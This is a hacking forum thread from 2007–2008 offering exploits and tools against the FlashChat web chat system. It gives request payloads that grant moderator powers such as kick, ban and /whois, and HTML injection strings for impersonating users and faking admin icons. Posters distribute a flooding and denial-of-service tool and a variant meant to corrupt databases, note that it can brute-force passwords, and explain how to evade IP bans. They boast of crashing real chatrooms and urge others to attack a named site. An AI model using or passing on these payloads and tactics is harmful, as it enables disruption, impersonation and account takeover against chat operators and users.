Flashchat exploits, hacks, tools & more

Researching, Proof of Concepts, Hacking, Console Modding and Hacking and more. No game hacking / modding here.

Flashchat exploits, hacks, tools & more

Postby Sethioz » Fri Sep 28, 2007 7:43 pm

Knowledge Database article of Flashchat Exploits Is now available, everything from now on will go there, i will not update this post anymore

I will collect all the exploits and tools into this very post soon, so it is easy to find all the exploits and tools by only reading first post.
In this topic you will find: (only descriptions for now)

Gadgets:

flashchatz - cmd based program wrote by Luigi Auriemma, it is a fake user DOS attack and exploit tool for flashchat (attached to post, in downloads and on Luigi's site)

Extreme Flashchat-X - GUI based flashchat client with multiple exploits in it (see below). wrote by dark_lord_tnt (see in topic).

Exploits:

Following things can be done without knowing admin/mod password:
kickout another user (exept admin)
ban another user (exept admin)
check any user's IP with the "/whois" command
add room/s
ring bell
get any icon/emoticon in front of your name (including admin icon)
get any icon/emoticon into the message

maybe i missed something, but i will update first post time to time, any ill try to add all the exploits into this post.

//////////////////////////////////////////////////////////////////////////////////////////////////////////

Code: Select all
Bell
    sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=

    add room
    sendAndLoad=%5Btype%20Function%5D&ps=&p=1&l=Cat&b=93647&c=adr&cid=1&id=

    admin icon:
    sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=

    mod icon:
    sendAndLoad=%5Btype%20Function%5D&a=%3Amod%3A&u=0&b=13862&c=ravt&cid=1&id=

    ip ban packet:
    sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
    5581 - id

    whois packet:   
    sendAndLoad=%5Btype%20Function%5D&s=7&t=%2Fwhois%20teele&r=2&u=0&b=20309&c=msg&cid=1&id=

    room alert:
    sendAndLoad=%5Btype%20Function%5D&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=

    sendAndLoad=%5Btype%20Function%5D&s=7&t=chatalert&b=18370&c=calrt&cid=1&id= 


for paros proxy (or other intercepting proxys), replace this:

Code: Select all
5D&t=


with this:

Code: Select all
5D&s=7&t=


to get some of the admin rights. you will be able to use /kickout, /whois and such commands with this filter.



//////////////////////////////////////////////////////////////////////////////////////////////////////////

HTML/PHP code exploits:

*Invisible name:
enter this as name

Code: Select all
</b>


*Impersonating others:
-login with invisible name
-now use this command to impersonate somebody

Code: Select all
/me <font color="#000000">[NAME] 0:00 xm: </font>


you can also get icon in front of name (including admin icon)

Code: Select all
/me <font color="#FFFFFF">:D  [NAME]: </font>


where ":D" is smile/icon. to get admin icon in front of name, put ":admin:". here's full example:

Code: Select all
/me <font color="#FF0000">:admin: [NAME]: </font>


-it may vary, depending on the chatroom. some does not use time, some use other font..etc. you must also find the color that this person uses (you can sniff it out from packets). so you just put his/her name into the brackets.

to get colored text too, do this:

Code: Select all
/me <font color="#FF0000">:D [NAME]: </font> <font color"=#8000BF">YOURMESSAGEHERE</font>


*Inject link into your name:
login with the following code/name

Code: Select all
<fontsize="13"></i><a href="http://link.here">Name</a></b>


where "Name" is the name you want and "http://link.here" is obviously where you insert link.
Attachments
flashchatz.zip
(43.02 KiB) Downloaded 1634 times
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Flashchatz - flashchat HACKS!!!

Postby Suicidal Looney » Fri Sep 28, 2007 9:43 pm

hmm i see
Suicidal Looney
User
User
 
Posts: 57
Joined: Sun Jul 29, 2007 7:04 am

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Sat Sep 29, 2007 4:27 am

oh yea and .. dont use this on our chatroom...it will fuck up db.
makes too much users....
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Flashchatz - flashchat HACKS!!!

Postby V » Sun Oct 07, 2007 1:31 pm

Damn loved the crash, bet those brats were squealing there like stuck pigs.
Last edited by V on Sun Jan 24, 2010 11:46 am, edited 1 time in total.
User avatar
V
Important
Important
 
Posts: 159
Joined: Sat Jul 28, 2007 7:36 am

Re: Flashchatz - flashchat HACKS!!!

Postby Skizoteq » Tue Nov 27, 2007 3:39 pm

Crashed xxx.xxx.xx many many times whit this puppy 8-) Thank you lord for creating this tool lol by lord i mean luigi :D

EDITED by Sethioz : removed the site name, because now this post is public !
User avatar
Skizoteq
Forum user
Forum user
 
Posts: 108
Joined: Tue Jul 31, 2007 11:41 am

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Tue Nov 27, 2007 4:01 pm

yes indeed its a good one from him. I did got him some info he needed. I will start working to get it working with user : pass chatrooms. Luigi said that np there...he just needs me to get him some info. I need to setup a test chat for that.

oh and btw .. one of the whiners from that xxxxxx chat, he has site with chat too .. and you can crash it using proxy LOL. here it is killerbean.pri.ee .. theres chat too...crash it as much as you want :D
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Flashchatz - flashchat HACKS!!!

Postby Skizoteq » Sun Dec 02, 2007 4:52 pm

killerbean :D Whats hes whining about lol User : pass chatrooms 8-) Oh man what would i ever do whitout luigi lol
User avatar
Skizoteq
Forum user
Forum user
 
Posts: 108
Joined: Tue Jul 31, 2007 11:41 am

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Sun Dec 02, 2007 11:25 pm

I would have been written it myself probably...its not so hard. only need few commands and some data.
Btw guys .. i found MAJOR glitch/bug in the flashchat. It involves specially chats with user : pass.
For example if you mess up some chat so badly that admin decides to change it from ''free'' to ''user : pass'' .. then who ever registers first can choose option ''administrator'' ..actually he/she HAVE to choose that. So first registered user will be admin. If you are quicker than admin then you can simple get his place LOL.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Mon Dec 03, 2007 11:24 pm

FIX
If you dont want noobz crashing your chat, change the name of ''getxml.php'' file. ..and ofcourse you have to modify all the files that uses it (index.php, flashchat.php ..etc).

New crash method:
simply open .exe in HEX and modify the ''getxml.php'' to whtever you like.
-note that not all HEX editors work. (you will know if it works or not...if not then you get simple error - not win32 app)


New type of Flashchatz (ill add as attachment).
its still beta, so it doesnt work well. (user flooding works fine, but other options have problems)
-Features :
flood user : pass chatrooms, with all options.
added ''add room'' flooding (IF available for normal users)
added smile flooding ( :D ) ..it causes crash too.

ENJOY!!!

UPDATE
it seems that bell works in all chatrooms, but addroom doesnt seem to work in all chatrooms. I have disabled addroom in my chatroom, but i can still add rooms as normal user.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Tue Dec 04, 2007 9:36 pm

.
Attachments
flashchatz.zip
4.dets.07
(39.94 KiB) Downloaded 921 times
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Wed Dec 05, 2007 4:41 am

This is hilarious guys :) I was testing with Luigi (he updated the flashchatz) ..he managed to make a ''player flood + bell'' ..so that gave me an idea.
If some fake user can ring bell . .then its possible to everybody. So i did some research .. and FINALLY. i found a way how to ring a bell as normal user (if bell is disabled for normal user).

Intrested ? ..course you are. Well what i use is ''Tamper data'' its an firefox add-on. It totally rocks. it allows you to edit EVERYTHING your browser sends. im also using ''live http header'' which Luigi suggested...its easier to capture data, but it wont work for bell. Thats y Luigi never got it working while in chat.
now .. you need the ''ring'' packet. it looks like this

Code: Select all
sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=a6657021e8f389f3bc01dcdf0d9c7a54


you DO NOT need the id at end (after id=). im pretty sure you can use this packet.
So what you do is ... you will start tamper (click submit for everything else). you type something in the chat box (DO NOT send it).
for example if you type like ''BLAHTEST1'' ... then press ''send'' and look the tamper. once it gives you pop-up you will click on ''tamper'' this time not ''submit'' ..and look in the right side where the data is. Look closely .. if its the right packet: containing ''BLAHTEST1'' .. then copy the ''ring'' packet (WITHOUT ID !!!!) and replace the whole data there (NOT ID). and then send it ..if it asks something like ... change to ...then click ok.

Little bit messy ? I know ! I will make an video tutorial soon. once you see how tamper works you will understand it ...its easy.

UPDATE
I made video tutorial. hope my talking aint very fucked up (i was a tired)
Its in the Video Tutorials Section. ENJOY :D
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Tue Dec 25, 2007 6:50 pm

MAYOR UPDATE:
special thanks to Luigi who wrote the tool.
now it is possible to load users from a file.
user pass
like this. still the old options

1 - user flooding
2 - message flooding
3 - room creation flooding
4 - smile flooding
5 - login/logout flooding
6 - user+bell flooding
+ now you are able to load users from a list.

if you run it, then it will ask you if you want to create users (only for the chatroom that requires registration) then you have 3 options:[
y - yes (start making users and flood with specified option)
N - no (do nothing, quit)
filename.txt (loads the specified file, it must be in the same dir with the flashchatz.exe)

YES you can use it to bruteforce user passwords..but simply adding ''victim'' username before each word in your wordlist.
to do this .. you can use cygnus hex editor (it seems that it works best)

it was made ? ..because it is possible to disable registration, so the flashchatz is useless during that. But now you can make users and write them down in file and use them later on. So target chatroom may have registration off, but you can still use existing users :twisted:

note: if you would like some changes ... like username complexity (only numbers, or only symbols instead of mix-alpha-num ones) etc, then let me know. I will make changes and recompile it and upload it.
Attachments
flashchatz.rar
new version of flashchatz (no source code)
(28.38 KiB) Downloaded 887 times
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Sat Mar 15, 2008 7:48 am

just lil something i did myself...
this version only registers users on attack 1, but does not login. so if u wanna fuck up somebodys database...leave it on for 10 hours or so and it should fuck up database. (run 5-20 instances of it to get good results, even more with good connection, 100-200 should not be problem with 100kb upload, just test) I havent tested this on other attacks but 1, i just edited attack one so it registers only.
fff.exe ?? ..couldnt make up anything better..change it if u dont like it.
oh yes and it also have more complex names, it uses some symbols too in names and passes.

note: theres problem with attack 1 and 6 on original version. IT DOES NOT effect register only version (it doesnt have buffer)!!! it seems that luigi made a small mistake and it has infinite buffer size. in other words...leave it on for hour and bye bye pc (ur pc). Thats because theres no buffer limit, ill fix it someday...IF i need to ..but i doubt. no need for that. you will get banned anyways if you leave it on in some chatroom (crashing).
Attachments
fff.rar
(30.35 KiB) Downloaded 659 times
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Sat Apr 19, 2008 2:58 am

Update:
Luigi fixed the memory problem and also fixed the problem with ''space'' in user and/or password.
Now you can use users/passes with spaces and it still loads the file as it should.

at this moment (19th april. 08) the latest version is 0.1.2c

I also added the version tht only registers users and don't login. Its remade and tested and works 100%.

I will also add on how to use this tool as password cracker. its very easy ! you only need commview and flashchatz, but i doubt tht any of u lazys need it :) ..so im not gonna post it after all. you can always reply here if u need to know how to crack passwords with it.
Attachments
flashchatz012c.rar
Flashchatz version 0.1.2c (fixed user/pass file reading and memory problem)
(27.73 KiB) Downloaded 684 times
fregonly.rar
use attack 1 to register users. Its good to fuck up database.
(30.35 KiB) Downloaded 682 times
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

FlashChat ( TuFat ) exploits

Postby david zaragoza » Mon Oct 06, 2008 4:16 am

i need help here to hack a TuFat flash chat

i gt the two programs usually used in this matter(WPE pro and tamper data addon for mozilla)

bt i dnt know how to use it.....

so anybody plz help me........


EDIT by Sethioz: topic name changed from "hack a TuFat flash chat"
If you want more detailed tutorial then check Flashchat exploits topic and reply there ! < theres exploits which allow you to ban and boot without admin/mod privileges and more !
david zaragoza
Newbie..
Newbie..
 
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am

Re: hack a TuFat flash chat

Postby Sethioz » Mon Oct 06, 2008 10:43 am

ok do you mean "tufat flash chat" or just "flashchat" .. is tufat like name of the site/room or is it name of the actual chat system ?
have you looked this-Video- ?
tamper data and WPE are quite good in this matter. If it is some kind of chat system, then link would be good.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: hack a TuFat flash chat

Postby david zaragoza » Tue Oct 07, 2008 1:21 am

i meant tufat flashchat

its the name of the chat system

u can google it for more info

wat i want is an immortal mode where u can enter back just after been banned

do u know a way to do this ?
david zaragoza
Newbie..
Newbie..
 
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am

Re: hack a TuFat flash chat

Postby Sethioz » Tue Oct 07, 2008 11:55 am

googling doesn't help me at all, i need example room where to test. reading about it won't give an idea how it works.
to me it seems that tufat flashchat is same as flashchat (one on my site).

as about banning, no there is no way to bypass IP or username ban. It is SQL based and you would need to hack into flashchat/site config files and SQL database to lift the ban. only way is to use other username and IP address.
you can also use proxy server. I have done research on it and the ip is only checked when connecting to flashchat. proxy server lags so it is not good to chat with proxy. what you can do is use proxy to login and then take it off.
You can use Vidalia+TOR and then firefox's addon called ProxySel
with that you will be able to enable/disable proxy with just one click, making it extremely easy to use proxy.

1. enable proxy
2. log into chatroom
3. disable proxy

that way also when admin/moderator checks your ip he/she will see the proxy ip you used to log into chatroom. FlashChat is weak and it does not check IP again. only checks it when you log into chat. I havent checked it, but maybe it is even possible to modify some packets so it wont send ip at all so flashchat thinks you are local client.

If you want more details and info .. give me URL to the chatroom you want to "hack". then i can take a look at it, if its same as mine or not.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: hack a TuFat flash chat

Postby david zaragoza » Wed Oct 08, 2008 2:30 am

the tufat flashchat is the same as in ur site....

im a rookie , so i dnt have any idea on how to hack into flashchat config files
abt proxy server, i tried it bt it seems to dnt work....
the firefox addon is nt compatible with my version of mozilla firefox 3.0...pity me

anyway i think its quite hard to hack just like tat....

bt i tried ur video tutorial on getting the admin or mod icon n it worked perfectly....

all the normal chatters thought im an admin....i even made fun with them by saying ur selected as a mod....lolz

had fun with tat....thank u very much sethioz....

bt i had to logout asap when the mod or admin enters.....to avoid being banned ....
then the chatroom mods can view my ip also .... i wanna be an invinsible rookie hacker....lolz




okie then ...how abt this .....changing the message name so it appears like somebody else said tat n make the somebody get banned instead of u....lolz


i read abt it in the topic "FLASHCHAT:ADMIN CONTROL PANEL"

ur msg in tat topic-

"as for more general. chatrooms are very vulnerable. i mean all kinds. for examples:
-in some chatrooms you can change message name, so it appears like somebody else said that (so you can get somebody else banned lol)....."


i actually watched this hack happened in a chatroom while i was chattin.....

the person wrote vulgar words n changed the message name to other person's name in the chatroom(the same chatroom url i sent to u by PM)....

n wow .........it gt the moderator to ban many innocent peoplez ..even me.....damm tat stupid mod......lolz....

so how abt it .....if u teach me how to do it ...it would be great deal of fun plus education...

futhermore knowledge is power ....:-)
david zaragoza
Newbie..
Newbie..
 
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am

Re: hack a TuFat flash chat

Postby Sethioz » Wed Oct 08, 2008 1:01 pm

yes it seems same, y u didnt want to post it out on public ? (url of chat i mean).
It also seem to be customized flash, it is not normal chatroom or at least it seems so. on some reason i didnt even got any data so icon or anything else didnt work on some reason. I just took a quick look in it. but the tool works perfectly :) (tool used to flood shit out of chatroom) it supports many different attack types: userflooding, message flooding, room creation ..etc. It does nothing to the chatroom itself, but it will crash browser's flash script...so everybody have to leave and relogin.
I've been in chatroom many times when it was used on chat .. and sometimes it even crashed my whole browser..doh.

as i said before, you can't bypass IP or username ban. only way is to change your IP or use proxy.
about firefox 3 .. it sucks big time. i even dunno why they made it. it looks childish and lags and doesn't support IMPORTANT addons..like proxysel, but you can always set proxy manually in settings. just put 127.0.0.1 9050 as proxy in firefox, but its annoying and u can't quickly enable/disable it. so i suggest you to get firefox 2 instead. its better in every way.

I will take another look in it anyways (chat).


Update:
i dunno what happend before, but now everything works :) It indeed is same flashchat, just didn't know its called tufat.
specific chatroom you talk about is not on the url you sent me. owner of site has moved the index.php of flashchat to another domain. ill give an example here:
flashchat.com/index.php - this is the chatroom where you sent me and this is where you login.
tufatchat.org/blahdoh/ - this is the path where all other chatroom files are located.

It doesn't really matter where the index is located, because it still sends info into right chatroom if you copy the index.php of the chat. I really have no clue how somebody was able to talk under other names in flashchat, because as far as i know it is ID based.
for example as shown in my tutorials, this is the admin icon:
Code: Select all
sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=

now look at the last bit of this data "id=" this is the id part. i left it empty, because you get id when you login or visit the getxml.php page. if you go directly to "getxml.php" (its the page that handles data sent by clients) you get this:
Code: Select all
−
   <response id="a71b57051abd921b01e995bbf31fca84">
<lout id="665982" t="6:22 pm">login</lout>
</response>

so it gives you id when you visit it too, but i dont think you can use this to talk under other name. you would need to know other person's ID and even then it somehow simply disconnects you.

You can try this ofcourse:
open private window with somebody (i suggest you use help of ur friend).
use commview or WPE pro or something like that to monitor your private messaging.
it should show you other person's ID, but im not sure.
then you can use tamper data and change your ID while sending message.
just like changing icons..etc. you monitor it with tamper data and click tamper, but change only ID not data.

ah yes. i got banned, so i had to use proxy myself. it works like a charm. i only loaded chatroom page with proxy. thats all you need to do. your IP is checked by chatroom only when you LOAD the page, not when you login. so enable proxy and LOAD the "index.php" and then you can disable proxy and login :) just to make it clear:

1. enable proxy
2. go to flashchat.com/index.php (where you see login screen)
3. disable proxy
4. enter name and login

almost forgot. a lil show-off at end :) check the pic and look closely for my message and name there ;)
Attachments
adminlol.JPG
(150.61 KiB) Downloaded 11338 times
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Next

Return to PC / Website / Console / Others > Hacking / Cracking / Exploits / Research

Who is online

Users browsing this forum: No registered users and 1 guest

cron